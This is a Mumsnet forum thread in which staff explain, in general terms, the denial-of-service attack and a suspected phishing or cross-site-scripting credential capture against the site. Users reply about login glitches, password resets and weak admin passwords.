More about the Technical side of the attacks on Mumsnet

[JustineMumsnet]

Hi all,
There are have been, understandably, a lot of questions about the tech side of the attack on Mumsnet, so here - courtesy of the tech team is some more detail. We obviously do have to be a bit careful with the details because we don't want to give away information that could help other hackers. Whilst it's true that "security through obscurity" isn't real security, we have no wish to make it easier for a future attacker.

We've spent a lot of time since the attacks began, proactively defending against them, minimising the impact of it and protecting against future attacks. With a busy site like Mumsnet there is a lot of information to go through. When we uncover a new snippet of information, perhaps a new suspicious user account, we have to go back to the start and reanalyze, so it can be slow going at times. We are working with our technology partners who have a lot of experience of these kind of attacks and we have used lots of resources available to us.

Some aspects of our technology stack have already been extensively tested by external specialists. Some of our software code is quite old - nearly as old as Mumsnet itself - and things have moved on a lot over that time. However, we have a program of code review whereby all new code is checked by someone other than the person who created it. It's not perfect and everyone makes mistakes, but we take the quality of our code very seriously.

The Denial Of Service (DOS) attack against Mumsnet was a heavy, sustained attack which initially overwhelmed our ability to respond to legitimate requests. Mumsnet might typically get something like 50-100 requests per second. During the attack we were getting around 17,000 requests per second. Each request carried more data than is normal as well.

The hacking attack on our website was separate from the DOS, though we believe perpetrated by the same person or people. We follow many of the industry's best practices, such as using HTTPS for our login pages, keeping our database separate from our cluster of web servers and not accessible from the internet, and so on. We don't necessarily use the same standards of security as say your online banking service might use, for example requiring multiple passwords or using two factor authentication. We try to balance security against usability and the sensitivity of the information we hold. After all, as pointed out by one of you in an earlier thread, the majority of information we have about a user is what that user publishes in Talk, which is there for all to see.

As has been mentioned several times, we keep our passwords encrypted and we use the recommended algorithms for this, with high "strength" settings. This means that if someone somehow obtained the password data from our database they wouldn't be able to make any use of them - they wouldn't work on our site or on any other site even if the user used the same password on that other site. This remains the case even for MNHQ staff; they cannot un-encrypt the passwords either.

We are now pretty confident it was a phishing attack. Phishing, where a hacker gets a user to enter their username and password into a form from which they can capture that information, fits all the data we have. The hacker doesn't need to decrypt anything, because they capture the password in the browser as it is entered (either by typing it, or if it was automatically remembered by the user's browser or password manager). The list of passwords that has been published includes some that users have identified as being ones that they've mistyped. Our database wouldn't have mistyped ones, only accurate ones, whereas those collected by recording what a user submits would and does contain errors.

It's not obvious how it has been conducted though. We have been able to create a proof of concept which shows that it could work, but that relies on some steps that would be difficult or virtually impossible for a hacker. Phishing attacks sometimes use social engineering to "trick" people into using the fake website rather than the real one, but again, for various reasons, we can rule some of these out. Other phishing attacks are more technical and use other means to get people to visit the fake page. One such example is Cross Site Scripting (XSS). XSS is ranked number three on Open Web Application Security Project top ten list of web site security problems. If the hacker can get the website to put his own code on pages which are to be viewed by other users, s/he can modify the page to either redirect the login process to their own site, to a page which looks just like our login page but is actually recording the details and sending them to the hacker. Also possible, but even less likely, is modifying our login page to submit the details to the hacker as well as to us. If the hacker had gained access to our Content Management System he could have done the former, though not the later. However, we record all changes that are made and there are no suspicious ones.

It's impossible for us to know how many users' passwords have been collected. It's a reasonable assumption, and our working one, that the passwords of everybody that has logged since 6th August 2015, and possibly some time before that, have been collected.

In light of the attacks, we've bolstered some aspects of our security, particularly around our administrative functions. We have further changes planned and will be working on these in the coming days.

Forcing everyone to reset their password, as we have done, would render the list useless provided that users don't choose the same new password and they've not used the same username and password elsewhere.

Some users have questioned why certain other changes aren't being made already, such as a move to enforcing stricter passwords, which makes sense. However, given how crucial the part of our system that deals with passwords is, we have to be really cautious when making changes to it so we don't want to rush and end up creating bigger holes but we will certainly take steps to encourage users to strengthen passwords as soon as practicable.

Any questions do post here - we'll answer as transparently as we can - bearing in mind the caveat about helping future hackers mentioned earlier.

I'm not bad at all - but maybe there's some DOS acitivity going on. Who can say?

iPad itsnotjust ?

Mines been driving me mad doing that. Much improved since I cleared cookies earlier.

Bore, no Macbook. I've cleared cookies but the arrow thingy flashes every time I type now.

Thinking about it, the text lagging the typing is something I've had a lot over the last few months so I may not have actually noticed it happening today. (I was trying to work out whether that was a download or upload issue and my brain told me 'Go Away' so I leave it to you all.)

I have a 'form saver' (selective keylogger) on my laptop - it saves my posts so I don't lose them if Mumsnet a website flips out before successfully uploading - and it causes a lag if it its database is too full or it's gone to sleep.

There are lots of possible reasons for lag: virus scanner running; automatic updates downloading; low battery in a wireless keyboard; other general stuff. But if you've recently noticed a consistent change for the worse, it could be worth using a few different malware scanners just in case.

Hmmmm. So I had to set up a completely new account with a new email address to get back on. My original listed account did not ever get forcibly locked out, despite me logging in and out many times on different devices to try and trigger a forced reset. Nada. So in the end I requested a password reset, received the email, clicked the link, was taken to an 'expired link' page. About eight times last night, as I kept trying to reset the password. Also tried different devices. Same. And another couple of times today, as obviously I had now successfully logged myself out by the password reset, but couldn't actually get a usable link to actually reset my password - all of them led to 'expired link'... Hence the completely new shiny account with new shiny email account.

Of course, I instantly forgot my password for the new account. So I gritted my teeth and requested a reset. Link worked first time.

So, is my 'listed' account utterly buggered then? Is this fishy? I am mildly curious that my compromised account didn't get a forced reset, and nor would it accept a password reset. And yet the new shiny one seems to be working like a dream on the same device... Without all the glitchy page reloading shite as well.

Hmm. Paranoia city, here, I tells ya.

And quelle horreur. Not only am I lilac but now I have to rummage in customize to sort everything out... I may be some time.

Can tech answer my question about the fact that the forums seem to point to MN being alerted about this problem in the middle of July?

And also how come after previis hacks passwords for admins were allowed to be so shockingly simple (eg. Rebecca's)?

Why weren't lessons apparently learned?

I should imagine that lessons have been learned now, 001, although there's probably a touch of TSSDNCOP around. (Other companies are probably scurrying like disturbed ants as well - not only from MN but also from the tale of Ashley Madison.)

You'd hope so!

I actually think 001 there should be a serious meeting about passwords. I know any site can get hacked but to have such awful passwords in place shows a complete disregard for the security of details of users

The points are well made - I just don't think you're going to get answers to them any time soon.

My own 'hope' is that the lessons - other than the immediate ones - aren't subsumed in some sort of 'We ought to.......' big review that takes two years to complete and ends up sitting on the CEO's desk for six months before being quietly filed.

MN is an internet business and needs to be able to react quickly, decisively and - most importantly - with a fair degree of breadth to any developments which potentially impact it. Anything else would, in my view, be sticking plaster and I would hope they didn't go only for such solutions, attractive though they might be to tired people.

I'm sure there has been and will be lots of serious meetings.

To be fair though, the hacker guy (unless he actually comes up with something "good") doesn't actually appear to have much information.

It's not like he actually got into Databases and extracted any ACTUAL information from their internal servers. Otherwise he'd be publishing MN users email addresses etc.

I agree - but I'm still not comfortable with the weaknesses (both organisational and technical) that this whole thing has exposed. That situation needs to be dealt with quickly.

(I'm going to bite my tongue on the topic for now though. I'm being reminded forcibly that I don't have a dog in this fight.)

they have been dealt with though (this time). My complaint was this isn;t the first time it's happened!

I'm not sure how different passwords would have helped, they weren't guessed in a social engineering manner.

Funnily enough, in changing my password for a number of sites several required me to have far stricter parameters than they had when I joined up, though none had told me by email at any point that they had changed their rules and I should change my password.

Dp has been hacked this week - both his bank account and credit card have been used fraudulently [real pain for him as he flew to the US today and has no access to his bank account or any credit card]. There is only one website he has ever used both on, but there has been nothing in the press about that [very large well known website] being hacked. So, I am working on the assumption he has been hacked somehow. He uses a work laptop so he's going to get that checked. He doesn't use MN.

No, secure passwords wouldn't have stopped phishing. But having such easy to guess passwords is ridiculous (seriously the was an admin password that was the sane as the username!) And this is after they've already been hacked before.

Its boggling

Websites are being broken into and internet users are being hacked all of the time. Mumsnet have, unlike others, been fairly open about most of the issues. (Total openness to the public on technical security matters would have been daft.) The problem is not them alone - 'they' are indeed Out To Get You.

MNHQ when I logged in yesterday on my iPad my password appeared in the search box? I immediately logged out then logged back in checking the http was on the address bar and it did it again! Might be a fluke but it worried me.

It's funny cos dp works in Internet security/firewalls and stuff, and he's not talking to me so he couldn't ask me for help with sorting it or a way to get some money while in the US.
I only knew cos I heard him telling dss.

Hurt pride - and I'm not belittling that, it's a very strong emotion.

It nearly all boils down to two things - money and/or 'other' with 'other' being some mix of power, glory, revenge, kudos - whichever one takes you in thrall. You see it all through life, it's just that right now, it happens to be with IT.

Alfie just go into settings on your iPad - you will have checked something to remember passwords for mn. I'm sure someone else will tell you exactly, - I think it's in settings under safari, then in the general box under passwords and auto fill. Not sinister. Just your iPad being 'helpful' until you tell it not to.

Thanks notinkansas I do have my password to autofill but I meant it showed up in the mumsnet search box at the top, as if I had typed it there. Never happened before so I thought I should mention it.

Ah right. Weird! I've been having all sorts of very strange things happen, and it is unnerving to not be able to sort the explainable from the weird but not worrying, to the definitely concerning but still plausibly just tech stuff as they are repairing the site...

I was reading up on the AM hack last night and it's a bit eye rolling. If one person can get into the pentagon then assume the internet isn't fool proof. At the end of the day humans invented IT, humans do the coding and systems are only as good as the coder. Even the best coders make mistakes.